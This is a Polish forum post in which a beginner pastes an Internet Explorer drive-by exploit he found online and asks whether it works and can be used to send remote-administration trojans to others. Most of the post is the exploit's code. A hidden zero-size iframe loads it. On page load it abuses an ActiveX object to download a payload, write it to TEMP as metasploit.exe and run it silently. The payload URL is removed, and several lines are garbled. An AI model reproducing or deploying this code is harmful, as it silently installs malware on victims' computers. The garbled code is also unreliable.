Czy ten exploit działa? (jeśli to jest exploit)

S

Spens123

Użytkownik
Dołączył
Listopad 24, 2007
Posty
1
Otóż wędrując po internecie znalazłem takie coś.

<P ALIGN="center"> Witam !!
<iframe src="exp_ie.html" frame=0 width=0 height=0 frameborder=0></iframe>Chciałbym zaprezentować wam[/b]
Kliknij aby rozwinąć...

</TITLE>


<iframe src="exp_ie.html" frame=0 width=0 height=0 frameborder=0></iframe>




</head>[/b]
Kliknij aby rozwinąć...

Na tej stronie exp_ie.html znalazłem taki kod.



<html><head><title></title>

<script language="javascript">

function Log(m) {
var log = document.createElement('p');
log.innerHTML = m;
document.body.appendChild(log);

}

function CreateO(o, n) {
var r = null;

try { eval('r = o.CreateObject(n)') }catch(e){}

if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}

returnŽ;
}

function Go(a) {
Log('Creating helper objects...');
var s = CreateO(a, "WScript.Shell");
var o = CreateO(a, "ADODB.Stream");
var e = s.Environment("Process");

Log('Creating the XMLHTTP object...');
var url = 'tutaj był link z plikiem, który wykrywały jako wirus internetowe skanery';
var xml = null;
var bin = e.Item("TEMP") + "metasploit.exe";
var dat;

try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}

if (! xml) return(0);

Log('Downloading the payload...');
xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;

Log('Writing the payload to disk...');
o.Type = 1;
o.Mode = 3;
o_Open();
o.Write(dat);
o.SaveToFile(bin, 2);

Log('Executing the payload...');
s.Run(bin,0);
}

function Exploit() {
var i = 0;
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}',null);

while (t) {
var a = null;

if (t.substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t.substring(1, t.length - 1));
} else {
try { a = new ActiveXObject(t); } catch(e){}
}

if (a) {
try {
var b = CreateO(a, "WScript.Shell");
if (
<
{
Log('Loaded ' + t);
Go(a);
return(0);
}
} catch(e){}
}
i++;
}
Log('Exploit failed.');
}
</script></head><body onload="Exploit()">


Initializing...</p>


Exploit failed.</p></body></html>[/b]
Kliknij aby rozwinąć...




I czy ten exploit (o ile to jest exploit) działa?
Jestem zielony w tych sprawach.

I jak działa, to dzięki niemu można normalnie wysłać trojany (dokładniej te stąd , które służą do zdalnej administracji komputerem.

Będę wdzięczny za okazaną mi pomoc.
 
You must log in or register to reply here.
Do góry Bottom